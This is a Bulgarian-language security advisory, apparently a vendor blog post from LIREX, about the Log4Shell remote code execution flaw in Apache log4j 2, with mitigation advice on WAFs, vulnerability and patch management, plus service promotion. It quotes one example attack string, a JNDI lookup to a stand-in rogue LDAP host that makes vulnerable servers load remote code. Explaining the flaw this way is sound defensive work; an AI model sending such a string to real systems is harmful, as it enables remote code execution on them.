Нова уязвимост и предпоставка за пробиви в системите на организациите

Java_vulnerability

В четвъртък (9 декември) беше откритa 0-day уязвимост в популярната logging библиотека на Java – log4j (версия 2), експлоатирането на която може да доведе до изпълнение на външен код (Remote Code Execution).

Apache log4j 2 e най-популярната java logging библиотека с над 400 000 сваляния и е вградена в почти всяка една интернет услуга или приложение. Последващите разследвания установиха, че уязвимостта е изключително лесна за експлоатация и критичността ѝ има оценка 10 от 10 по общата система за оценка на уязвимости (CVSS).

image_2_cloud_security_article_lirex

Уязвимостта е свързана с начина по който log request-ire се обработват от процесора log4j. Ако нападателят изпрати специално създаден (съдържащ стринг като ${jndi:ldap://rogueldapserver.com/a}), това може да доведе до зареждане на външен клас код и изпълнение на този код, водещо до Remote Code Execution (RCE). Това може да нанесе големи щети върху ИТ инфраструктурата.

Повечето известни към момента екплойти, ползващи тази уязвимост са насочени към crypto mining, но уязвимостта има потенциала да бъде и отворена врата към вътрешни системи и чувствителни данни.

Броят на различните вариации на оригиналната уязвимост достигна над 60 само за 24 часа, което дава на нападателите много алтернативи за заобикаляне на съществуващи защити и реално възползване от уязвимостта.

Това означава, че съществуващите защити е необходимо най-малкото да се проверят и съответно да се надградят, за да могат да са адекватни и срещу тази уязвимост.

Както става ясно от препоръките от Computer Emergency Response Team (GovCERT) of the Swiss government за минимизиране на рисковете първата и най-логична защита би била Web Application Firewall.

Работа вършат WAF решения, които „се учат“ бързо, за да могат да бъдат ефективни на оптимално ниво. Такава технология е advanced WAF, комбинираща силата на machine learning и threat intelligence.

image_1_Identity and Access management_lirex

0-day уязвимости са един от векторите на атака, които хакерите използват най-често.  

От ключово значение за постигането на устойчива сигурност е внедряването на процедури за управление на уязвимости (Vulnerability Management) и софтуерни актуализации за сигурност (Patch Management) с цел своевременното и адекватно реагиране в ситуации като описаната по-горе.

Защото, според експертите в областта, превенцията и адекватното реагирането при ситуация са със значима роля за постигането на устойчивост на бизнеса.

 

Разберете повече за управление на уязвимостите

Организациите, които използват по стара версия на Log4j е добре също да обърнат внимание на това, че старите версии на Log4j имат подобни критични уязвимости като CVE-2019-17571от 2019-та година със Score 9.8.

Вижте още услуги за интегрирана сигурност от LIREX

Security Operations Centre

Тестове за пробив в сигурността

Одит на ИТ сигурност

Обучения за Security Awareness

Експертите на LIREX познават отлично най-добрите практики в бранша и ще ви консултират при избора на най-подходящата стратегия за изграждане на устойчива сигурност спрямо индивидуалните нужди на вашата организация.

Свържете се с нас, за консултация!

Направи запитване